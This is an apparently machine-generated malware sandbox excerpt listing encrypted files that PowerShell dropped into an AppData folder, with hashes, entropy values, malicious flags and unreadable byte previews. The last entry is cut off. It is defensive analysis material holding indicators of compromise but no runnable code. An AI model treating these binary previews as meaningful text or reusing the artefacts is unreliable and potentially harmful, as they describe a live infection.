                                                                                                    Preview: w.fXpv.A..Y.`E..s..3B5l....v..:.9...<.d..O.`.....F.....B#.r..=..}..{..d.B.<.......%..:...f.....G.2.B...6...........+.\*.5L.r+h..w....)Xi.}...oJn.Y..i.....F..T ..I....V3.}.s....S.N9..N....O)}q.%....<..*..'i..hE..EH@T.t.........k....g.{...y....s.kWj.....|....T..%*k.6<...6G.cg...*.J...^.n*...-.uHt.!-w..S.J.A..N@..v]M.n...3^.5.x..b....}.'.s,..WPgmt...0w`.......O.vIN.@.|.gY5.PE.U.6...}.z...Z.n...v...-{.8~.A.1T.X.n.s..u..C.!..c.d..S...@...9.....5j.}....fxR........e.2I.w.4x.Ga..-X[Q_$k.!.H?.Z...R~V. 7..!.sq.1.....q4'.3G.j..d?S{}..tQ. ..>...B.VK..<..+."R-..S..b<......e.O<...oQ....DQ..S...=..YG.c...nAO.|..Wk....s....0.]h.e..zc..^8:..lGcZ....'.|..E....=..~..}0..~...h^.-.S..7....:H.y)...u.....O%....K.c......C..UU=.......BpX..?0.a$..(....NVTgS.S...Y@.{..izA.Q.xT..l........Xf....-.!nl.]...........u.CN..\d.]rVu.J.e?.}.pM|?l.yf.w..4A.Q.....*([).?{f.G.....>.....nA.Ln.{G.["S.C..&....B=.......Dh..^G.....2..s+......*..T....A......[..U.%.!..^...h.!pn> .....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\diZbzOSoXpn.yHmFnNkjUBgPV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):155255
                                                                                                    Entropy (8bit):7.9987671245786665
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:a8l9Y9ctwioHMgvrxy+HI/4FDR8A/bzHvFTgg2SMDWuXWAqH:a8lBtwiwMgI+HIAD8AjzHtTamuQ
                                                                                                    MD5:F3170630F0B9746CDAD6740FFAFD95EC
                                                                                                    SHA1:424D3285AB3D190D13A1E30130AD1BA5D8544FE6
                                                                                                    SHA-256:9F1EADE3747CE2A4E723A32B5625C788DC4078CBD12675C18FDE6BEF5CD75032
                                                                                                    SHA-512:0BC2F95EB186BED136DBB2485331BF9530B372CC5B3299814F2D2840DE77EDADE11BF443B7980083B5D1BB2D0736CC85FE5388F6DAA75AFCF774F2730B0FB665
                                                                                                    Malicious:true
                                                                                                    Preview: .s{s^.IP/...;.[.k".r...L.)^;i...0S.HJK.^.c..zN..........4 ..\.o...... 0..D.=.xn.j....../.8..l...1.C1..of2|..V?..8...h....^o._Q.=..!5=.......Q].[.4^U...W/B_.e...I(I..tZ..y.:J.H.w.?.M.CZ...L."...)....8..../.^/...a...g..-W.mxH...D..B....j..NU...+C...@. ...q..3...w... .n.]c*.y..P+..p.<..|,.....-I.S..L.St.j.a../.T...SJ..\&A`..OL.eZ.2..x....b..\.5.....).&[.......M!I.3WZ..<".......k.i..H..aM.w.k.s.N.z..9.=..I].3..Z..L.+.O.|..b-}......r....x.._S...3....r...r.....]....a..s{...K(.....p.\...%.%].81].v.1J...L.M.CI........}...Uu.p..T....PT2G........HDB.R.F.3^...LV.e./......td.^...'I.l...i. .o..I.$.`.YD.f@.........F..w.4H...-:..}.Q'4a..-LI}....^.;.A.4F.\K..Y..m.8fZaV^.!.+.J..{..k.h.... ....9.QD.B.{ ..|Y.M.L.....z.OJ~H}a.z5....7.^.._....sH.|.@iS.......G..3....Z.L...........[B..)...G..._..!..3&....y../.|..0.`..z..."..............&....D........).Be&.|R}..t.FD....\...%...J{.VPs......tD.o.D..N.....P.A?.P....lX.0fl8....Em6...(..^;....Cp
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\djYBXphMPa.UPBOWgXhIwqTuAxGo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83487
                                                                                                    Entropy (8bit):7.99771937889109
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:RgRSmNJjW9uiE6PTj+hoOu5IoreyZElt19cwxgwURG+6te:RgRSQJoNEwTSi7moqyZtGUc+5
                                                                                                    MD5:0025B8675E8A46F7D35BA200E381F5F9
                                                                                                    SHA1:B446D834216F82628D9A6A1CF3C860C930EF8F70
                                                                                                    SHA-256:56C21B815A0DFA251E6B69AF64B3C32B8B9082D9019166671AA32CC14C471B09
                                                                                                    SHA-512:4A1D0BA5F728C3E8FEE0EA317B1B663A54E9550A0A59959CA9C1F070D339323DC4BF6E7EED4FE73AF2E7F388AB9E73BF926793FCCCE2BB91DABA40F722F2D79B
                                                                                                    Malicious:true
                                                                                                    Preview: .....9..N..v..L.\#...F.d...UY......8yf..g..i)p.B3Bh.....%m.-.r.o..<....iP..k[..%......@..9.T.. k..P.R.'U2.B.....b.P>..4|..g...J.WS.P;.qZ|l.rB ..e..,........6!.p ...L&$..S....tGkD..z.d..G|..$Z..R.Z.k?.._.AU...xg...\.5D..V../%....P.A.ke.Nb4.EW62.. ..%.f...0o.G2....`...W........l.....yq..M4U2...q...Y...J?...}.7r..r......<...........)........T.....p.{Y<H.+...^..?I".;....t..0tA...Xsn..~.Y....T..E..h...v(Z..T..../5y.}>...;b'.K_..<...|.$U.....#.8...f6....R.O].W.....M...b'..$lu?....0^.oF.*h...J...0..!%<.....s.B..{.W0...n.&./...sa...r[.Z....GL%...s..g..|G..v...{3.".{c...[.B.w..^j..aZ*+......cH..b...M.. .T....]ET..W....j..Iq....e..G...up..6....N ..1B...@.(l......).:...hE..i.z.V"...#T.6v@.....L...Y..s&....|.M.....Z.....W._....+......&I..;....C=..w.`..jE..Q2g..1LNq...u..xl.T.......x...:....,..u...'.[.....Z..d4.......P5p..K...2. .1)e.x...~.SC.Eh..G.\D&)..Uk...C^njM.[.oD.1..?.Lg.;.Ey..<!.....R..u......k.q....".t0..g....XH0...qL....b{.0/......V...t.>
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dquYUPXIpbHo.eFBYJvTHAI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):136657
                                                                                                    Entropy (8bit):7.998703743314394
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:SN6F/astw79Kk2v7F8SGHnusxSOr6ArNuB8f0SiRL:Sa/astw7UbFZgG5vR
                                                                                                    MD5:CD4175E22454F92B5547B4CF5EE6AF23
                                                                                                    SHA1:DE7D57729AAE89D45E988ADCC4092065840ABC79
                                                                                                    SHA-256:B6DACAB469EE796AA5C5A187E72B5C737E20D12FFDBD224EAFC216A6217D0226
                                                                                                    SHA-512:43294344DAEEAA41D0D90EBD8C78C8D78035C0BC609956F44F491556867959C5078A5CC313AB7225999C21976E0CF0CA6E75996E799D1142AB5BD0553A7F6042
                                                                                                    Malicious:true
                                                                                                    Preview: .sJ_.C0ls...r.....Z..O.eE...SS..|...b.<./..".k.,c...".h..A'}. aU...oEO....FB^+..&....H%}.....b...`A..6..e.!...v|.1..k..J.......v..P.?...j3....:5.d..ga...I...u.=,0.%..V..F.F........`#... ..<..!....x*..d....2F.1.as7..Gr....t.Rm.=k.m........J..........I*..0.....x.1....z.ib...Z.-..QF.......n.[...]......o.'..@....'.W........J...H.9.C]wj...#.^s..j.+.Nu...G.x.d.Q...j.'.>...PM......h........d:..VQ..(.....d_.*.....!W....s21.kXAAd...r...4...........(t...._....<.(U.m..%...r...O.......7.....,d.*...'F.4..t.+e..*I.c..#`Q.v3JH@.p.ZF.w.37..H.N..9V?Rxt...Ic^..\,.<. *.Es./..........v..V`..v$.5..MY.|T..H......@.h#...A.._;.MW Ry(.R..<M.c.^.82.....0.`...ld=J..{..0....H...v.R-.'o.Y".....[.......0yl..E.....1.3?...;}Y...B4*._.}...!.31.Dy:...y.'.#.<.....L....KM.B.....@.....'.<..<.@....+.}.)....b7...........%.b.>L...\.._.eD.QlbF.F..C.........te3.........1.L_Y.+.....{d......./.6.4...?..-McLa9}..._......?.*q.)..H..o=.N..z..,."B..V.....}.V#.7.........._bp'.g....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dyLVtBHlIAYSxpEgz.MHPzriKYueyCQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87687
                                                                                                    Entropy (8bit):7.997769939491714
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:k6FXReG/vwjQvJ4em09PdUtu/0kdL5AM9ei3k8PNUhoh4QdyWCgFcLPglutkmO:k61j/vwjQvJt9FaAL5J3tP4w48nC6RSO
                                                                                                    MD5:1EEC09FB9E274C16E28FA714F71BAE2D
                                                                                                    SHA1:3C8948DDCA902D194EF03DC1EC49605AEA776129
                                                                                                    SHA-256:B2880C414A0902076F09E638EEC68D8F318DFA1DFA812F0C8F033A29E3B0D5B3
                                                                                                    SHA-512:6D9DD1C0B56A6C1F48B0BA679ADCA929F5502B25D2D6A86C68848AB3715A7713FBDBDD53CA5EAAFFEDC9232FD7B0A42BF3AA8D486B3F27C56F76857B326EDC1B
                                                                                                    Malicious:true
                                                                                                    Preview: .......F..>5..g.Z<.....'. s.L$..w...Y.8.;-tK...J..B.{..p....N.=.I......L.O...4..(.0..9.k.lCo....1........@:T...U%.../F.Q .rK....O..].jU.X...h...Y.I#....:...>...c.B..A.2.m..w..Mz..;..I.....m.......d...../W.R.P-Li..p.;|.g.z.S..l....Ln......7g?...UI..D.wbD.w.o.......i.d....J...}N.~..*...lDH....'..`+I.+.c.c....' ...x..v..t...4".Z..#X....(.........?U...g...../..:e...p....6.o...z^.a.P2...L-+]...u_...eY...&1.U...P......A.n.>.L.O..x....c...}D.d.....K.....K.j.k[...........T.yu..N7.."h1.\..$.."..v4....G...l_r.\..#...o...$...r....A..Pki.#U.\._..tm..`..8D[..>...dn..o.K...a...L...W|t........R...F.......0.....6;.....eC...`.Fd.f.T.Y.@.U^..+.....c.T..@D.9.....6.L..c..oW.M..A.D..b.4......hI.2......0EV.p...c........._..6..k..2..6l.I.....8..^.G...g.4.l...0(....wb..@...m..#G...T.7..!...r...D..%..[...p.y..h...V...h..S5.v...K..!4.#.W..nc..S....~.#.%..kFH.....^q...Mn2..!...c.6.Y.'.c.........i.C...qS.....a...z}.%.w..zj.]..`=-}P..4b..m...../.....Y........c.4
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eCrZlGDugJvo.BjAEKmeRvyYPNVW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187598
                                                                                                    Entropy (8bit):7.999130534204915
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3OJfn1qFzi4oy1RWEOhyaz0WvX3kHWV+IqxFvK0Trc8KXlRKDuRjVgn96k34t2+I:+FYm4Dzr+X3PIIqxo0TrEAK7gAkoon
                                                                                                    MD5:37827706BB42764DD32ADFFEDA0C1DA8
                                                                                                    SHA1:0DC39465A4A2FE83BF52D1450F295654DA9CC9D0
                                                                                                    SHA-256:E580BEA9A0E650CAF6C26B5DA78D0C55588FCEC975CF5183DE1D60266B358498
                                                                                                    SHA-512:6561DA6B3C38C8F4FC28400C30E50201D8CD5CBF924150E4A788FA61CACBF6983D3A36F431F137E371B17679E7AC0EDDDAE1CE9265CC6688EBD2D2923C2717FD
                                                                                                    Malicious:true
                                                                                                    Preview: k...S.R,.......s}f{.6...v}.a.U._"=(|:...t.+Nl..R..A...N.z.......V|E.^8......dX.7{...^B.x.B.m...J.....Q........P...:V.].>q<o.OmN..g.-..UzQ.>.,.)X../.fP.*....X.yUD.*]..6...[.F.....:=1P...W.R.!.4.k_@..rX.z.Kj.....B.?..|...=....h'6.M..m.D..K7..N.....X.6ug4K._..C.N..'h^.[.R.u].J..2e.....9./W.h...a.+.^....w#.....J@.n2~..s/..2U^.c....C.g...z"z..BU(.z...%D/.[..".[..C.t.....P.....-{r..........}.~..,L.+ns2#...z.h8..J1......!...i.t....P..^...S.jMG.O.B.y.Ex.!.D..4.=2..y..N.U...k.N..$:.E.>..........,...1...?$CH~Y......3..H3.....R=Pd>i...s[..a.h.?.."|.b4mv.F..Z......4.$.+.g.LM....|..L.......qs..p.#.......C (.j......Y..8.W.e..~.XZ..h.......8...k.;....%..`...c..C.u}.1..K]....~a.*.C..yB..'...w./......F..C%!'.z..9.^~.O2...?.J..V..B%...8.5...K.`O>k.5..U....{\E...._...aF......(...u..."V....vO....WE...p..l..{A.....FD......j.A<.Kf.6......~P...a.$...a....9..h*..0..hJ.#3[...k..Sn..4-..K./.r....b....t.})h.j."{....fsj....$.dl....7vG.P....J...[..}};.!kEg.2X..1...z9Ue...9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eFAuURICmGWxTJhZ.rANdkeWhLaMIPsz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117959
                                                                                                    Entropy (8bit):7.998307830809259
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:TnHXdtJhEifBrhIsXLApQniFzwlvZ8XVCeK54MHBknJbzO:TnHXfJhLI2LniFzrAeK54MHBknZO
                                                                                                    MD5:01C17D5EFB6414AF179DB7691AC85083
                                                                                                    SHA1:E22CB4E882420E28CD3CD011BCED6BEBDD68DDD7
                                                                                                    SHA-256:E60C41183D8E43DBB16DF26EDA500C7B4A181D3EE02B2D269DF82D217BB1636E
                                                                                                    SHA-512:B3FC82180A22DF50E8069D12FB591AEFCEF4E37CAFD3FF5B11CC133E4BBA444932E6122A734796FE52C16EA9E8DDD6789D95325291B494BF5EE6981470C123CF
                                                                                                    Malicious:true
                                                                                                    Preview: ..s.....(.]..$..K.l>.D:.~..m^ExC.K.0.p..4.....*I+.{..E.9.E.J:H.].......0.C.0..}S.#2...&....*`U..1;... `..K.E.i...-...*`......v...e..Qf......H.^Db3.......I.m#.{m."i3E?.^S."...ou..M.......y..U..5A.&.+.#X2W..+.....m...\q.......y..H.h.*C....^Sn..|.SV.2.;.;\..Y...#.Vp....kk\IpW....".~..z..&-M..K.[....._.8.....6...n..<...D=.....~u..h........CM.O........ .!....Kcs.&........F....{..4..k........P.@].w.. .....f.__p?.....>.......n.p..tO3.9."..1...yD?[VH.9...........{. .C.6.r...Z.~//..C;t(..$_.'i;.'.Y9.o.....F.#.t_.p7...w....Jh..3C9E3.uuxul..J.rq..`....V.R.;.{...Q.T@.e..9?...cX._(jDD..n\:v..%.."..si../.mV...@.v..&e.1..I@s..h.;#.-........b........8....|Y.&3n.Kg......C:^|+.H.....A.:.-.%.gF..^S@)..k......iX.3N.E(...,.. .h../...1.uy..._.....b.t...'J.7..%UK.i....PQ.k.~..Op0)...!!.+.b..\.y!....W#..S.!..kZ..+.|s.......M`.]!.S......}._..)Eg..7....r4...C.m.r..VZ..h%}<D........S._R...:..%."_........s<.= ...X.....,O]B R.t.T.....`.#.....y=<N*n@j..~.\@.V...L.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eVtyxMBYrJQpUwFPkG.hAgncHXBEDxVYMRU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):197862
                                                                                                    Entropy (8bit):7.998945643084014
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:eyBG6jYEsQPuVH+BKMxoPGaGK4OJsDybN6:eYG6rrPAQxyvX/smY
                                                                                                    MD5:9FBA9E34323B076C2FA9B62E4B96AA13
                                                                                                    SHA1:EEBDA9BDB5C70830319DD6CC06505B2C69CDB094
                                                                                                    SHA-256:1968A7D19AC24FAF139076E06208F9F6DC0DC168AF6761687466B3C118D3C0D5
                                                                                                    SHA-512:16C02136A8BDCED28EBAA37CF1DA8173FDF863230D7A9FC30A63AB2704885769B5229D4341214DA7B00B59AA818DBEAF834F144A9A3F6565C8B49D5FBA4E6091
                                                                                                    Malicious:true
                                                                                                    Preview: ....?.J.....5.#G_..39EKg3.3....[3..h...]*...k..!.R>>.M0.h..|@.%...V.A.&...Kn`j,Vq..s.BD.8x.......Si).CfG......D....$q.c....}...1J.....-.E[]..}u4.L..."........m.(8....o+V...W0....'k.w.Ws(..{q..8.L.....Vd....Tm..........5.NX..z...]=/1.V.0?.."..h.&6...n.....k...o~.....f].+I.|.T..G.q........... .'fJ ...'|..j.IX.A....6..A&.c.....;......c.Y.W..W..../v.T...E.....\.M..!=.*p...m..:..@...\.+.. ZM........b....l.S.~.E.I..X.4..,......r>.s....y.5.'(p.y..[+....5...]S..<y.k1.DC.....>............q.{.3....t..O;.0Vb......[...g*.(.Q'.#fd.xJ.. ...wsZ...,....WYJ...3..tHm(.w...K...,.....u.!.W.~.d.?^U..K......ez.v.R...m.g'|.X..sxz.q..5K....J......T..#.? l.4w.+aJ...E......u....w......V..|.\.U>....6_N....Z.A..TB~....N.....6.....x....z..n..\;.....K..~....o....#$..r....c.r.uw.;..Y.0....>/.....\7I%...<H...hY`.XG.qO...e....k2..#=-n..&....7.../.T._.C)B$B/.8..<.D.2m......g.............+.u..^..~K......T7.L.0{.c..0..!.A....Z..E...|.......A.E|^......n..O..6+.Ei.#O>.3.k
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eWylVtdKbnQsAOrFXBC.QTPEUDeznKIt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):172431
                                                                                                    Entropy (8bit):7.998873473527906
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CdzVBkLzQoMbliYLrPcRjTsRnj58T9sGW52UDwJ9zOkK9T6lukqca6AmkrJCEKdP:4MoblrBhjuT4eJDK9Tuu9bvJCETY
                                                                                                    MD5:4A408ED11FC2825F999BCB9D5240F26E
                                                                                                    SHA1:203F6060B93556D36C35191FF80B3FFF1293FC5A
                                                                                                    SHA-256:168D337B6CBFF76EAD35E3DC7C0220FF5A47AF078413C555E4A98E11C329B9EF
                                                                                                    SHA-512:DC737E7861E3EF2A6F124353AA344384F63C611C020E89700570792CF0FFF9393A7E233506DBE11E7021AB5DFB4681BF7256C93E3560EE9A277A57E804F549F6
                                                                                                    Malicious:true
                                                                                                    Preview: .C...M...Z/.9.h....`.g:..].g......q..|.os.8..d.~.:D...]....'h..`. o...h@.].b.H.!..D...!.l..L.5Gf.Df.......\.0Q..Xc.....3.*...@..am...F......q.....vF."E...`&dUYc...A...CO.w..I......Ko..tY.!.-&....p.q.A{.....B.........q...-.I./t._.<.......Ui.[F........W.........k..9n./.d..W......=.Kzz=..8.r^.sxNhH..9..P..o,u.5G.....+.W.e)y.X5.)..z*~...b.=.{...t.p.oUX...U.@c.Y.6.D........M..#...01fC^?.h87!c1..J.K...3P..t..$1...S)Z..%%Q.^,u....}.*...|..C.,....zoe!...hv...(u..k`},y>%..#.J..S..*4.....x......6y`g.<Jh9e...Gg..A}ux.e.."C.SI.c...6...X..;;..b....i(...V...V...3.1m1{.H%..*.6....n.....;>..QY..qO:1,Q..DDb.7...Y]...D9.hN.=.i.l.d.=..|?.A....jt...q-....[...p.........O-....f......,.'\....fE...R.,...mC*..)v.........d..A.S..>m.Q7.'...`..(..tn.}.4....i...T(;$. \..R,1-..f..X/...%.r\.o.b...@.a.w....*.....R...o_.7..'.G`..."[.&...~......8.@..rueJ.P..?):..;%.M..CV.4q..K..C.e........hGOm.u8.....I.@........o_R...............s..7G.....o.S...Mv.<...: z..YY^3..>
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\enmCDFMOPZ.EkadGRjZpxKzh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):52287
                                                                                                    Entropy (8bit):7.9970044596649
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:TwD6aYhI48qooyyDgaAiSY4qcwZQgB5GBkAwjSHCvxgOe1Xx0S4j6HsHaOh:Ts0hI7AxkwZQgB5+wjEs+1Xx0opOh
                                                                                                    MD5:16D5E00254A1A4E7DD1CD0C48C86C02F
                                                                                                    SHA1:A500DB6C06AB4581E29457A2CA6C0EDE3C89FAA9
                                                                                                    SHA-256:88931ABB12933803A6FAA1F09E911090BE99DC7BA464C86378170FA771A3521A
                                                                                                    SHA-512:BE2ECEBFB4D8CEE02E772CDB3C54E779B3D52ABF1CCCE7315B292F865F146861C0C9028564EACDF6D75D904C3F88A4E29ED3493365D030C49CE248B1B1FCF206
                                                                                                    Malicious:true
                                                                                                    Preview: .r...O..K..(:-Ku|.%....J...A..........^Wr......\.=|...T...Bnp.Uyb....3.-n..Y'.}S...D..........BwHGl.n.x..`.d........4.....3.Cl.....ev7.r...&^5.V.v\.B......C|....X...f..f.....7u..*...s..k....p.J...a...]........?.'.s@+(.6..D&z...\..H!......"....ny4a.86..tu...v.j.C..ei.@..r,....9.3n[..6&{c$.6...=..hf..\...xj......C<.......mms..?^s....;.b.....zC>..g.-...z.....+.u.}...+....0e.)..9_.1X.}X5H!......W..._.....I~f.\7.Q.f...x....$E..x..m!8...B.....[{.....c.Gj.{........}Q.....i..Y|CH..n...`..PBpf..f...i^..i....Qtu;..>.C;......../.H...O!....B.....5k...IV.wV!....\...\..O=lSH...d...i...g...R.".9.R....\..h$.%..C........./x.....Z......{.B..=......,\I....,....Wy..j...xzK...X.\<h......6v..}.....t@...../C.,.$.y...{h...].p......n.'.....x..JX.&...H.g...C.Q5f..z..R7*._......@....L.......6;B#...-.....SZ.......g>J....N'.(...z_.^}.jJ.d..-.D..o#.ThA~..].....C.X'...x......-,.1.4%.........Z...jTm..1{.IS^.(...LXxdx.].@7...B.,.9.It.c.X.`+|V2....!...AEB..]qJ.#.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fCrLagBDxmWXKsNZ.CFTfLJWDqKrvVRpeuI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137769
                                                                                                    Entropy (8bit):7.998772365626511
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WWceiK+Swke35wwOlrkYzJSpd/OVgbn8BjTqR4lP0krirb:RiK+uCwwOlrH8v/YKn8Bc4lPJrirb
                                                                                                    MD5:7E7D7E1B71BCF6BE02D2AD29B136DA54
                                                                                                    SHA1:6A702098B7F272D82D1C3415B846FF7E8568C168
                                                                                                    SHA-256:63CBBD75F6E2BAEE55D85ABE5753D293C924AF258DA9700F01500C7D3EEFEEA2
                                                                                                    SHA-512:B13ABB48AB0C897DE9972EE32E09ED64280E8435AEC4A8C19F9342AABD5074C78B6A1D371FEC62C79986D52B680F31D2A53A664E215C77EE6C332BCAA67820C1
                                                                                                    Malicious:true
                                                                                                    Preview: .....r"0.ONN..v..z.T.bR....F.syI....{G...&js./..$..R.|Xs.....7...;...2...;..."..&ydyq*.f5$....@.M].V".....9:..80...D .....KY. .[....W.[. }-..$.].I...F....1......3E.:........_.3ZM>.|.......2 B.......).{=4......<.u.^.m....ft....J9..$x..L.7...Bt.uo...3..0....z.M35x...'a...5xB...D. ...v..ad..[<.g..V.G>F./q1...$86@,..r(.......<....9vT.h.....\m.J.....W....Ah.0..,Y.....J...#..i..D/.+..oj\...m...e.K./......l..Q....gvp..c........f)X...f....P......r..&.....J..D......Hc....Ct^.n.Q!.`.41@tzJ$....U.e.8.L...`ut6.aS.t..9.T.m..\-}.7.TU.....o...=.....a..1..U}.....<.b.....u....0.0.9.=..#D..9Wu.E..%a.6..SS...$ri.z....?.......&9..RTG.............K..!.e....d........2...fo.........6..=.s...J..*o......k....{.w^.G.^.g.@...&h.\c......3.o$S.;s..[h.$QH....V.)D..V..%.."G..sC.j.R.B...7.w....Xx*z.......F.i....q....z.s..D..1B.bDH.......H.].}..6`.....R`.s..P...O.....jE`1..Q...t.........&....A......:G1~.<...B(T "0...a..C.v8;....M......sy.VF......!.5.J...E.h.&BaK..c.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fGDIzwUjLRKFkg.OWMZLFlYPbmygzu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94746
                                                                                                    Entropy (8bit):7.998163525179552
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:g1tzj1NsF4yOzGSbrSfafh5+hW2kx2Ra0ygWhw6n20GWpYI1wSBbcg5pd3ZAitj+:scjRSbrSS5X70ypwACQnBoI6ihS
                                                                                                    MD5:3CB974940DD369B3801BCC2BC712686A
                                                                                                    SHA1:C6E291A153A797C069F9D26417B5A864DD1ECAD1
                                                                                                    SHA-256:F63AF3AA9648EC18B59B78769B829767C032677988B7A6C1185E7B84767CA88C
                                                                                                    SHA-512:1F6B927DA1C5E39E128F0E5EB962B33D6BE3A7BE3AA07C0C9E0871E46F32B820742AA512AADF5B89BDEBB12EC385A4223AD8C0A3B111FC260682BFC6EC3C2200
                                                                                                    Malicious:true
                                                                                                    Preview: q.`.m......>I;..$e...J...?RN..+..g2...f.:...'...h4.....l....-9iH.Z[......E-....Ox.U. ..Q.......2Kf.C........X*.v.S.rdVM...A.^,E.kV..3Y<>). si....).....v..+....U.J.iaC[..HP5......4...TK..-Uh.ei.|.F..I..@..H.C.x..........l.....zJgNT........%...`l..(.=.....t].+N.**O.}.....H6G...\/..!r..-./.;3.<,..u..Y...G....m.........*}.^....;..@....d}....';}.rU....'...M..z#..Iud1.&....i.U...........u......K..:A.....~j.Akl...M.4.\.[U..I..p....E:...x(3......I...6UU..{.!7....{iYg...3!..LJ....a-.`..J:.....\...tA5.+...bE.f3%E^e.ww..-...,&#.bW...B6EL.....K....{.e&..E&...^._.( ..!&8..=Ko%).......%(..b.v.....uD.I.Z.:~.\U.#..A. .....'J...P..)-.w.<.~......rKpf..,;!.aHp.:..X.. ..{g....lV*..H.'..=.dV:D.|.DA..Y.....].|.66.hz4..?...s.6s6DU}..R8g.}1..Q....>.D..0\.R.6...'.<.1|.}..k..g...(4!.F.T^2.h}r.....o.)..hX:..g.d{.W...'....}t:.....b..t....y~r...8.....iw(...A...Z&.}........9..p8..c.%(..Kw..\7.~#K..CU...7u.>....#..?5.2....k7-.....n..~..E.Z.J=. .8..>.M.4........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fIFzstWXGVUKqZ.vZQDfGTWLkhCIAbi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82625
                                                                                                    Entropy (8bit):7.997608308417149
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:zspdcXOu077QOCmKQjX8iKyWfpKfqXePlTlmBfz0V/iWGz1+M1G/Jvh:QrAkjmkPNtiz5+uqz
                                                                                                    MD5:B30416D4F5163FBE340D53C931B5B693
                                                                                                    SHA1:0589ED58671FD004BDBC34E77F4A98F4B67BB5FC
                                                                                                    SHA-256:8AE2FADF8A25F53C5BE15AF519E3A13FDC9D30EE2D83907AFC510F785E633A92
                                                                                                    SHA-512:6BFBA7257611BE666201084AF6997480084138E79212DA29FE4FA3975A7387A51759F456E80BC494582720A372D8D10CDF59D48B7CDF81D6DE0476DD36FF08ED
                                                                                                    Malicious:true
                                                                                                    Preview: ...Hg.4]}..f[...(..p.y=..|....3.`..`...e.M..CX$)..Qf.?d.....o.*..$Ek)?x~8+a.|#.)p.0..r..w..g..H.=...4s..1.9S....j...T.....j..JM..>c....A.}9W.k."^....MH..H...9..c.kt...yC.F]...n..V..TP:*.d.M.A..U...3....!|I.c.|..v.7.$..p.+&A.......B..P/..2...e.'......s.?......?...4.v....o.Z.......~.r.b.rO.L.b..u......1.33N.-T..tk+Z..^S......tK..i..s..l/.V".m...zJi_KI.P..&...>.......'x......`i...,x ....F|....Q..x...8...`...I.......p.4...w.....wN...kH.'X..3..*0...]..gW..M-..1*Xi.....bIV._..u...eK...Y....QV.6\..j^.....}....G~..5K./7...._.....g.M......m.q.......~.3."..V.!....G.0,g.~eqZ'.R.T0.M....L.u..v..Mk3c.B..9i.........JAw..b|...........I.....ul.s.W.t.R...8..3j..j;..K..5\.W"....^./.....5..L..........!.....y...4.Y.............7.._.R.8...",.Pf.X.'>.Q....oM..SX.A..^k.. ....YaC.Q.].C....\Y...8.Qz..0.bn....6......X...%_5.......d[.e50dK..K.b....|..Sg<..V..XS.Ru.a9...?..e.UU.S..c......}.s....ky.i............eJ.Y\.Wc.,u.>...b.....K.....'G...xD....."SN....5".u.%.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJNzeMPqlHuCXwU.uHgyXIeMqWjpVmLx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112032
                                                                                                    Entropy (8bit):7.998237205817344
                                                                                                    Encrypted:true
